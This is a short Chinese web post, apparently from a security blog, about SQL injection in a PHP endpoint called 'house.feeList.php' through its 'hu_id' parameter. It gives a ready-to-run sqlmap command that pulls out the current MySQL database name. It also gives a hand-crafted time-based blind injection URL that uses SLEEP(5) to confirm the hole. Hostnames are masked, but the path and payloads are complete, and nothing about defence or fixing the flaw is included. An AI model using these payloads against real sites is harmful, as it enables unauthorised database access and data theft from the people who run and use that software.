释放双眼,带上耳机,听听看~!
Sqlmap语法:
sqlmap -u "http://xxxx/wuser/house.feeList.php?hu_id=1" --level 5 --risk 3 --dbms=mysql --current-db或者手工通过时间查询判断注入
通过时间判断注入,该操作会让访问时间增加5秒
http://xxx/wuser/house.feeList.php?hu_id=1%20AND%20(SELECT%207965%20FROM%20(SELECT(SLEEP(5)))DVYc)声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
